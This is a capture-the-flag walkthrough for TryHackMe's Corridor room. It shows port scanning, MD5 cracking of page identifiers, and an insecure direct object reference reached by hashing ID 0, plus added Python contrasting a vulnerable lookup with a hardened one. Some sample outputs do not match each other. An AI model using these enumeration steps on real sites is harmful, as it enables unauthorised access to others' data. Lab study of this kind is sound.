# Corridor CTF | TryHackMe

<figure><img src="/files/Rl9GUExOt5tgc20mvqU6" alt=""><figcaption><p>Can you escape the corridor?</p></figcaption></figure>

![IDOR](https://img.shields.io/badge/IDOR-red) ![Web](https://img.shields.io/badge/Web-blue) ![Security](https://img.shields.io/badge/Security-green)

## [TryHackMe | Corridor](https://tryhackme.com/room/corridor)

Let’s add the target IP to our hosts file, /etc/hosts.

I always map the target IP to target.local in /etc/hosts so that I don’t have to type the IP address all the time during an engagement. For example, my /etc/hosts contains the following:

```bash
sudo nano /etc/hosts
```

```bash
## Targets
192.168.1.1 myrouter.local
TARGET_IP target.local
```

## Initial Recon

We will use Nmap and directory enumeration to get an initial overview of the target.

Since we are doing a stealth (SYN) scan, which needs raw sockets, we have to run Nmap with sudo:

```bash
sudo nmap -sCSV -p- -Pn target.local
```

Explanation of the command parameters:

```bash
-sC : Run the default NSE scripts against every open port nmap finds
-sS : Do a SYN scan (stealth scan), which never completes the TCP handshake
-sV : Get the version of the service running on that particular port

-p- : Scan all 65535 TCP ports
-Pn : Treat all hosts as online -- skip host discovery
```

The following should be the expected output:

```bash
Nmap scan report for target.local
Host is up (0.16s latency).
Not shown: 65518 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Werkzeug httpd 2.0.3 (Python 3.10.2)
|_http-title: Corridor
7936/tcp  filtered unknown
15239/tcp filtered unknown
20884/tcp filtered unknown
24144/tcp filtered unknown
35478/tcp filtered unknown
39063/tcp filtered vroa
48519/tcp filtered unknown
50423/tcp filtered unknown
51278/tcp filtered unknown
52203/tcp filtered unknown
54695/tcp filtered unknown
56706/tcp filtered unknown
59725/tcp filtered unknown
62079/tcp filtered unknown
63530/tcp filtered unknown
64701/tcp filtered unknown
```

Let’s see if there are any UDP ports available to us:

```bash
sudo nmap -sCSVU -p- -Pn target.local
```

```bash
PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc

# It seems that all the other ports are filtered and most of them are not relevant, so let's focus on one port
```

```bash
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Werkzeug httpd 2.0.3 (Python 3.10.2)
|_http-title: Corridor

# The service is a Python (Werkzeug) web server; there is not much to exploit
# in the server itself, it just serves a simple web page
```

If we visit target.local, the website appears to consist only of pictures with links, and the link targets look very much like hashes.

A quick one-line bash command gives us the list of all hashes present on that page:

```bash
curl target.local | grep -o 'alt="[a-z0-9]\{32\}"' | awk -F '"' '{print $2}'

# This should generate the following output
<--
c4ca4238a0b923820dcc509a6f75849b
c81e728d9d4c2f636f067f89cc14862c
eccbc87e4b5ce2fe28308fd9f2a7baf3
--
```

Let’s check what kind of hash is being used.

Use this tool:

[Hash Type Identifier - Identify unknown hashes](https://hashes.com/en/tools/hash_identifier)

## Attack Phase

Let's use John to crack the hashes, or use an online lookup service such as

<https://hashes.com/en/decrypt/hash>

```bash
john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5

# We now have the numbers behind the hashes
<--
1679091c5a880faf6fb5e6087eb1b2dc:6
45c48cce2e2d7fbdea1afc51c7c6ad26:9
8f14e45fceea167a5a36dedd4bea2543:7
--
```
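The extraction one-liner, the hash identification and the cracking step above can all be done offline in one place once you notice that the hashes are MD5 digests of small integers: instead of a wordlist, precompute md5(str(i)) for a range of integers and look each page hash up in that table. The script below is an added example, not part of the original writeup; the HTML it parses is a constructed sample that mimics the Corridor index page (it deliberately omits the entry for 3 to show that the gap finder reports every hole, plus the next expected ID, rather than a single value).

```python
import hashlib
import re

# Constructed sample page: <img> tags whose alt attributes carry 32-hex strings,
# as on the Corridor index page. Entry "3" is intentionally left out.
SAMPLE_HTML = """
<html><body>
<a href="/c4ca4238a0b923820dcc509a6f75849b"><img alt="c4ca4238a0b923820dcc509a6f75849b" src="/static/a.jpg"></a>
<a href="/c81e728d9d4c2f636f067f89cc14862c"><img alt="c81e728d9d4c2f636f067f89cc14862c" src="/static/b.jpg"></a>
<a href="/a87ff679a2f3e71d9181a67b7542122c"><img alt="a87ff679a2f3e71d9181a67b7542122c" src="/static/c.jpg"></a>
</body></html>
"""

HEX32 = re.compile(r'alt="([0-9a-f]{32})"')


def extract_hashes(html):
    """Same job as the curl | grep | awk one-liner: pull every 32-hex alt value."""
    return HEX32.findall(html)


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def small_int_table(limit):
    """Precompute md5(str(i)) for 0 <= i < limit, keyed by digest (the 'wordlist')."""
    return {md5_hex(str(i)): i for i in range(limit)}


def recover_ids(hashes, limit=100000):
    """Map each digest back to its integer; None when no small-integer preimage matches."""
    table = small_int_table(limit)
    return {h: table.get(h) for h in hashes}


def missing_ids(ids):
    """Every integer absent from 1..max(ids), plus the next value after the maximum.

    Handles more than one gap, unlike the single-value sum trick.
    """
    present = set(ids)
    return [i for i in range(1, max(present) + 2) if i not in present]


if __name__ == "__main__":
    hashes = extract_hashes(SAMPLE_HTML)
    mapping = recover_ids(hashes)
    for h, i in mapping.items():
        print(f"{h}:{i}")          # same hash:plaintext layout as the cracked list above
    ids = [i for i in mapping.values() if i is not None]
    print("candidate missing IDs:", missing_ids(ids))
```

A hash whose value is `None` after `recover_ids` is one that is not the MD5 of a small integer, which is itself useful information: it tells you the scheme is not purely sequential.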

Let’s find the missing number. A simple Python program will find it for us:

```python
# Find the missing element of the sequence 1..N+1 given N of its values
def findMissing(arr, N):
    # mark every value we have seen (value v lands in slot v-1)
    seen = [0] * (N + 1)
    for i in range(N):
        seen[arr[i] - 1] = 1

    # the one unmarked slot is the missing number
    for i in range(N + 1):
        if seen[i] == 0:
            return i + 1


def MissingNo(arr):
    # sum of 1..N+1 minus the sum of the values we have
    n = len(arr)
    total = (n + 1) * (n + 2) // 2   # integer division so the result prints as 14, not 14.0
    return total - sum(arr)


# Driver code
if __name__ == '__main__':
    arr = [6, 9, 7, 4, 1, 2, 8, 5, 3, 11, 12, 13, 10]
    N = len(arr)
    print(MissingNo(arr))

    # Alternative function call
    # print(findMissing(arr, N))
```

We get 14 as the output; let's convert it to an MD5 hash:

```bash
echo -n "14" | md5sum | awk '{print $1}'

# the following is the output
aab3238922bcc25a6f606eb525ffdc56
```

## Delivery Phase

Let’s use the hash in the URL:

```bash
curl http://target.local/aab3238922bcc25a6f606eb525ffdc56
```

We seem to hit a dead end here 😞

<figure><img src="/files/Ai4TRYswrGV6M8dJ0CDq" alt=""><figcaption><p>dead end!</p></figcaption></figure>

To get past this, let's try the hash of 0 or -1: a common pattern in the IDOR vulnerability realm is that the admin account has ID 0, -1 or 1.

Let's encode 0 as an MD5 hash:

```bash
echo -n 0 | md5sum | awk '{print $1}'

# the following output is generated
cfcd208495d565ef66e7_redacted

# Let's append that to the URL of our target
http://target.local/cfcd208495d565_redacted
```
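What makes this an IDOR is not the hashing but the combination of a guessable object reference (md5 of a sequential ID) with no check on who is requesting it. The added example below, which is not code from the writeup or from the Corridor room, contrasts the two patterns in plain Python functions standing in for Werkzeug route handlers: the vulnerable lookup resolves md5(str(id)) straight to a record, so md5("0") reaches the privileged entry, while the hardened lookup binds each record to a random 128-bit token and still enforces ownership. The record table, owners and tokens are constructed sample data.

```python
import hashlib
import secrets

# Constructed sample data: record 0 is the privileged one, the rest belong to ordinary users.
RECORDS = {
    0: {"owner": "admin", "body": "admin-only page"},
    1: {"owner": "alice", "body": "alice's page"},
    2: {"owner": "bob", "body": "bob's page"},
}


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


# --- Vulnerable pattern: the URL token is md5(str(id)); nobody checks who is asking.
VULN_INDEX = {md5_hex(str(i)): i for i in RECORDS}


def vulnerable_lookup(token):
    """Token resolves directly to the record. Guess md5('0') and you get the admin entry."""
    rid = VULN_INDEX.get(token)
    return None if rid is None else RECORDS[rid]["body"]


# --- Hardened pattern: opaque random tokens plus an ownership check on every request.
TOKEN_TO_ID = {}
ID_TO_TOKEN = {}


def issue_token(rid):
    """Bind a fresh 128-bit random token to a record (done server side when the record is created)."""
    token = secrets.token_urlsafe(16)
    TOKEN_TO_ID[token] = rid
    ID_TO_TOKEN[rid] = token
    return token


for _rid in RECORDS:
    issue_token(_rid)


def hardened_lookup(token, current_user):
    """Resolve the token, then require that the authenticated caller owns the record.

    Unknown token and wrong owner return the same None, so the response does not
    reveal whether a record exists behind a guessed reference.
    """
    rid = TOKEN_TO_ID.get(token)
    if rid is None or RECORDS[rid]["owner"] != current_user:
        return None
    return RECORDS[rid]["body"]


if __name__ == "__main__":
    print("vulnerable, md5('0'):", vulnerable_lookup(md5_hex("0")))
    print("hardened, md5('0') as alice:", hardened_lookup(md5_hex("0"), "alice"))
    print("hardened, own token as alice:", hardened_lookup(ID_TO_TOKEN[1], "alice"))
    print("hardened, alice's token as bob:", hardened_lookup(ID_TO_TOKEN[1], "bob"))
```

The ownership check is the part that actually closes the hole; the random token only stops enumeration. Without the check, a token leaked in a log or referrer still exposes the record, which is why both controls belong together.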

## Exploitation <a href="#exploitation" id="exploitation"></a>

Now visit the URL you got: <http://target.local/cfcd208495d565_redacted>

We should now have the flag: **REDACTED\_FLAG**

<figure><img src="/files/WAN1fy6lzJiAHohWvoA5" alt=""><figcaption><p>flag</p></figcaption></figure>

Thanks for reading, hope you learned something new 😎


